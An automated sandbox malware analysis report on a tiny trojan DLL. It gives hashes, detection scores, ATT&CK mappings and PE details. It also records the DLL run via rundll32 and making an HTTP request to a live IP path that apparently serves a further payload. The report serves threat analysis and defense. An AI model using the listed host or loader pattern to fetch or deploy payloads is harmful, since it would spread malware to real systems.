Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report sample3.bin

Overview

General Information

Sample Name:sample3.bin (renamed file extension from bin to dll)
Analysis ID:339445
MD5:b4164149ffc43c2bf55cb66922e738b0
SHA1:78c01aa4f88d35acfbc3d7142232cd1aa7682a6e
SHA256:800e1192e5ec3d2d9b17a3e2d8996cadbdd96ac6d8c59dfcf989264a956eb8d4

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates a DirectInput object (often for capturing keystrokes)
Internet Provider seen in connection with other malware
Program does not show much activity (idle)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 3564 cmdline: loaddll32.exe 'C:\Users\user\Desktop\sample3.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • rundll32.exe (PID: 2148 cmdline: rundll32.exe C:\Users\user\Desktop\sample3.dll,D MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: sample3.dllVirustotal: Detection: 56%Perma Link
Source: sample3.dllReversingLabs: Detection: 68%
Source: sample3.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: sample3.dllStatic PE information: NO_SEH, DYNAMIC_BASE, NX_COMPAT
Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global trafficHTTP traffic detected: GET /campo/z/z HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 207.154.235.218Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 207.154.235.218
Source: unknownTCP traffic detected without corresponding DNS query: 207.154.235.218
Source: unknownTCP traffic detected without corresponding DNS query: 207.154.235.218
Source: unknownTCP traffic detected without corresponding DNS query: 207.154.235.218
Source: unknownTCP traffic detected without corresponding DNS query: 207.154.235.218
Source: global trafficHTTP traffic detected: GET /campo/z/z HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 207.154.235.218Connection: Keep-Alive
Source: sample3.dllString found in binary or memory: http://207.154.235.218/campo/z/z
Source: sample3.dllString found in binary or memory: http://207.154.235.218/campo/z/zC:
Source: loaddll32.exe, 00000001.00000002.210657283.000000000105B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: sample3.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engineClassification label: mal56.evad.winDLL@4/0@0/1
Source: sample3.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Source: sample3.dllVirustotal: Detection: 56%
Source: sample3.dllReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\sample3.dll'
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Source: sample3.dllStatic PE information: NO_SEH, DYNAMIC_BASE, NX_COMPAT
Source: sample3.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00F2EB77 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00F2EE61 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00F2EA91 push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00F2CE94 pushad ; iretd
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 207.154.235.218 80

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Rundll321Input Capture1System Information Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection11LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
sample3.dll57%VirustotalBrowse
sample3.dll3%MetadefenderBrowse
sample3.dll69%ReversingLabsWin32.Trojan.Tiny

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://207.154.235.218/campo/z/z4%VirustotalBrowse
http://207.154.235.218/campo/z/z0%Avira URL Cloudsafe
http://207.154.235.218/campo/z/zC:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://207.154.235.218/campo/z/ztrue
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://207.154.235.218/campo/z/zC:sample3.dllfalse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
207.154.235.218
unknownUnited States
14061DIGITALOCEAN-ASNUStrue

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:339445
Start date:14.01.2021
Start time:03:57:54
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 7s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:sample3.bin (renamed file extension from bin to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.evad.winDLL@4/0@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): svchost.exe
  • Execution Graph export aborted for target rundll32.exe, PID 2148 because there are no executed function
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
03:58:46API Interceptor1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
207.154.235.218SecuriteInfo.com.Exploit.Siggen2.65090.20789.xlsGet hashmaliciousBrowse
  • 207.154.235.218/campo/q/q
SecuriteInfo.com.Exploit.Siggen2.65090.20789.xlsGet hashmaliciousBrowse
  • 207.154.235.218/campo/q/q

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
DIGITALOCEAN-ASNUSsample1.docGet hashmaliciousBrowse
  • 188.226.165.170
RRW9901200241.exeGet hashmaliciousBrowse
  • 161.35.25.247
Byrnes Gould PLLC.odtGet hashmaliciousBrowse
  • 178.128.131.91
pHUWiFd56t.exeGet hashmaliciousBrowse
  • 107.170.138.56
Project review_Pdf.exeGet hashmaliciousBrowse
  • 128.199.234.84
Consignment Details.exeGet hashmaliciousBrowse
  • 161.35.147.117
btVnDhh5K7.exeGet hashmaliciousBrowse
  • 167.71.226.205
0XrD9TsGUr.exeGet hashmaliciousBrowse
  • 107.170.138.56
RFQ 41680.xlsxGet hashmaliciousBrowse
  • 178.62.58.5
Doc.docGet hashmaliciousBrowse
  • 178.128.68.22
mobdro.apkGet hashmaliciousBrowse
  • 142.93.74.196
mobdro.apkGet hashmaliciousBrowse
  • 142.93.74.196
Test.HTMGet hashmaliciousBrowse
  • 159.89.4.250
Doc.docGet hashmaliciousBrowse
  • 167.71.148.58
Electronic form.docGet hashmaliciousBrowse
  • 157.245.123.197
______.docGet hashmaliciousBrowse
  • 188.166.207.182
______.docGet hashmaliciousBrowse
  • 188.166.207.182
http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
  • 5.101.110.225
info.docGet hashmaliciousBrowse
  • 138.197.99.250
JI35907_2020.docGet hashmaliciousBrowse
  • 178.128.68.22

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):3.6753551074955317
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:sample3.dll
File size:4096
MD5:b4164149ffc43c2bf55cb66922e738b0
SHA1:78c01aa4f88d35acfbc3d7142232cd1aa7682a6e
SHA256:800e1192e5ec3d2d9b17a3e2d8996cadbdd96ac6d8c59dfcf989264a956eb8d4
SHA512:3971ffaed0a282602fdd0984093480638eab6415351c80e6e6a3921b4a312f2451d0f6964370a5f471ee52f3776c86dce757fd5d4ee1e0b150e92efda4054048
SSDEEP:48:aOYItNcalsIk6B82DyWVyzKZ+uhFJheDrJsRuUTe:frlsIv+khQlrJMdT
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................b......................./......./......./......./.......Rich....................PE..L......^...........!.......

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x10000000
Entrypoint Section:
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:NO_SEH, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5EC4118E [Tue May 19 17:04:14 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:00efe7c5f7ae0f17696c089cc9514203

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x21800x44.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x22b00x3c.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xf8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x58.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x21400x38.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x20000x20.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x2880x400False0.4169921875data4.07030293356IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x20000x3800x400False0.556640625data4.45928642652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x30000x180x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x40000xf80x200False0.3359375data2.51196201565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x50000x580x200False0.19921875data1.32066429345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_MANIFEST0x40600x91XML 1.0 document textEnglishUnited States

Imports

DLLImport
KERNEL32.dllGetProcAddress, LoadLibraryA, LocalAlloc, lstrlenA, CloseHandle
VCRUNTIME140.dllmemset

Exports

NameOrdinalAddress
D10x10001110

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jan 14, 2021 03:58:43.856898069 CET4971580192.168.2.3207.154.235.218
Jan 14, 2021 03:58:43.897797108 CET8049715207.154.235.218192.168.2.3
Jan 14, 2021 03:58:43.898005009 CET4971580192.168.2.3207.154.235.218
Jan 14, 2021 03:58:43.899333000 CET4971580192.168.2.3207.154.235.218
Jan 14, 2021 03:58:43.939624071 CET8049715207.154.235.218192.168.2.3
Jan 14, 2021 03:58:43.939666033 CET8049715207.154.235.218192.168.2.3
Jan 14, 2021 03:58:43.939781904 CET4971580192.168.2.3207.154.235.218
Jan 14, 2021 03:58:43.941756964 CET4971580192.168.2.3207.154.235.218
Jan 14, 2021 03:58:43.981983900 CET8049715207.154.235.218192.168.2.3

HTTP Request Dependency Graph

  • 207.154.235.218

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.349715207.154.235.21880C:\Windows\SysWOW64\rundll32.exe
TimestampkBytes transferredDirectionData
Jan 14, 2021 03:58:43.899333000 CET605OUTGET /campo/z/z HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 207.154.235.218
Connection: Keep-Alive


Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3564 Parent PID: 5740

General

Start time:03:58:42
Start date:14/01/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\sample3.dll'
Imagebase:0x230000
File size:120832 bytes
MD5 hash:2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Analysis Process: rundll32.exe PID: 2148 Parent PID: 3564

General

Start time:03:58:42
Start date:14/01/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\sample3.dll,D
Imagebase:0x11a0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

Reset < >